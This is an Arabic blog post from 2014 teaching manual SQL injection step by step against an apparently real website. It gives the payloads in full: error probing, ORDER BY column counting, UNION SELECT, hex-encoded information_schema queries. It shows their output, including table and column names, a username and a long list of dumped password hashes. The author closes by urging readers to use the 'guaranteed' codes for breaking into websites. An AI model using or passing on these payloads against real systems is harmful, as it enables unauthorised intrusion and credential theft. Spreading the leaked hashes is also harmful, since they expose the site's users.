- Back to Home »
- حتراف الحقن اليدوي مستوى متوسط
Posted by : Unknown
الثلاثاء، 4 مارس 2014
start
بعد أن جلبنا الموقع المستهدف .. كيف نعرف انه مصاب
['] نعرف انه مصاب بوضع هذه العلامة في آخر الرابط [']
نتابع كيف
طيب زي ماانتم شايفين
Error in query: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near '\' AND
valid = '1' AND id < 2000 order by c_id' at line 1
إذاً الموقع مصاب بثغرة sql
الان امر استخراج الاعمده
+order+by+1--
كما ترون اختفى الخطأ خلونا نزيد إلى 100
+order+by+100--
كما ترون رجع الخطأ خلونا ننقص إلى
+order+by+16--
الخطأ ما زال خلونا ننقص إلى
+order+by+15--
حسناً الان تبيّنا لنا ان عدد الأعمده هو 15 عامود
الان نكتب هذا الأمر لأستخراج الأعمده المصابة
+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
[-] وما ننسى هذه العلامة قبل الرقم
9-12 حسنا الان ظهرت لنا الأعمده المصابة
9 حسناً الآن سنستخدم العامود
هُنا أرجو التركيز
نبدأ بـِ
database() امر استخراج اسم القاعدة ويوضع في مكان العامود المصاب
[ anakonda_humor2 ] هذا هو اسم القاعدة
الان لا بد من تشفير اسم القاعد يتم التشفير عبر هذا الموقع
http://www.waraxe.us/sql-char-encoder.html
0x616e616b6f6e64615f68756d6f7232
الان تم التشفير
لماذا نشفر اسم قاعدة البيانات ؟.. يتم تشفير اسم قاعدة البيانات ليستطيع الموقع التعرف
على الامر.
Group_Concat(Table_name) الان نضع هذا الكود في العامود المصاب
الان نضع هذا الكود في آخر الرابط ,, ونضيف في آخر الكود اسم قاعدة البيانات المشفر
+from+information_Schema.tables+where +table_schema+like+
0x616e616b6f6e64615f68756d6f7232
ها هيَ الجداول
Adventures,AdventuresMembers,AdventuresSuggestions,AdventuresText,Astro_Animals,
Astro_Elements,Astro_Match,Astro_Signs,BlogComments,BlogEntries,BlogSubscribers,
Blogs,ComicsMosad,DidYouKnow,
ForumMessages,ForumTopics,Humor
,IP,Members,PollQuestions,Polls,Reshimot
,Reshimot_Lines,Tgoovot,active_guests
,active_users,admin,articles,banned_users,ba
بعد ضهور الجداول التي يوجد بداخلها اليوزر والباس الخاص في الادمن
نبحث عن اسم الادمن بين الجداول
مثآآل
;admin; وهي تعني اسم الادمن + وهي تخص في ايجاد اليوزر والباس
;Administrator; وهي ايضاً تخص الآدمن + وهي تخص في ايجاد اليوزر و الباس
;Users ; وهي ايضاً تخص في ايجاد اليوزر و الباس
;Adm; وهي ايضاً تخص في ايجاد اليوزر والباس
; Auteurs; وهي تعني محرر + وهي تخص في ايجاد اليوزر والبآآس
حسنا بعد التعرف على ملفات الادمن يتم تشفير إحدى
هذه الكلمات ليتقبّلها الموقع المستهدف نتابع كيف سنستخرجها من الجداول وتشفيرها
حسناً وجدنا في الجداول هذا الملف و سنشفره
users
حسنا الان نريد إظهار الأعمدة وليس الجداول
نكتب هذا الكود في العامود المصاب
Group_Concat(Column_name)
نكتب هذا الكود في نهاية الرابط مع العلم
ان هذا الرقم المشفر هو اسم الادمن الذي شفرناه الذي يحتوي على اليوزر والباس
+from+information_Schema.Columns+where+table_name+like+0x7573657273--
ملاحضة !!
نلاحظ ان كود العامود المصاب تغيير من
Group_Concat(table_name)
إلى
Group_Concat(column_name)
الان ظهرت لنا العواميد ما يهمنا منها الا اليوزر نيم و الباسوورد
username,password,userid,userlevel,email,timestamp
الان نريد استخراج اليوزر والباس وهي آخر مرحله في الحقن
(username) نضع هذه الكلمة وهي يوزر نيم بدلاً من كلمة
[column_name] في العامود المصاب
+from+users-- ونضع هذا الكود في آخر الرابط لأستخراج اليوزر
[111] الان ظهر اليوزر وهوَ
username الان سنظهر الباس بتبديل كلمة
password بكلمة
تابعو كيف
طيب هذي باسات مو باس واحد فقط وكلها مشفره
5e83e8e8a6b5ffeff1f69aff011ea1f8
,e4676d6bac75c3512bf8860b75ffe70f
,d08be11264c4d21568068ce12541d768,
5e83e8e8a6b5ffeff1f69aff011ea1f8,
759b6fea1788f4a4765ba0e082c3a700,
5884d06de086a31d875874f670a39cd0,
199d8ec42da9c9b204872c5d8cdc51e1,
4d4098d64e163d2726959455d046fd7c,
285fc095262479a9f230ac32122c50ca,
38697e1e185cb02fca2d0f9b04c214dc,
bd73c2878f3eaa023f8c817dffa484ef,
4820cedb76ea10203e816dd438834871,
9bf6e7ff321f04a76c9078c32c9e91dc,
87aac78d7f230c037dfc7f304f20b987,
6d276e1854d4576cebda473d79ed5bc2,
0b98463d9854f588e5e98113cf53c41a,
b6354798e19fcb6f76deac7f803e9e1a,
7ce544c6473d8a7ad8b0ade74b091089,
303160624bc0b8d5d13bd325f614130f,
b5f76ca1107df79c2a1a4714f38ef808,
c62f505c0280042855b114e1cd52addc,
e14530fbe835b751f2ce8f3e392f9dd9,
4dd09a6055f0e373f3f6803131483a3f,
9b6c8eb0d3a04cf6a509be802fbb445a,
19e2001699525e3c13ddf131ce6739d5,
203e7af33763e930ed49f1f9dd424730,
c55341dcd4e1ec26d157a653611f7c11
1f1767b5696e79116b11ecc7f2882783,
4f0a3bd0ffb3b503ead445edf16aee9f,
d458b7a2ab0ac561518460c324742cc2,
ملاحظة!!
بعض المواقع يكون للآدمن باسووردات كثيرة مثل هذا الموقع
وبعض المواقع لن تجد سوى باس واحد ويمكن حتى ما يكون مشفر
أتمنى وصلت الفكرة :)
اتمنى تقدير تعبي في هذا الدرس وأتمنى أنني أفدتكم ولو بالقليل
ملاحظة !!
[%100] الأكواد المستخدمة في الشرح مضمونة
وأفضل أن تستخدمها أنت في رحلتك في إختراق المواقع بثغرة[sql]
--------------------------------------------------------------
في امان الله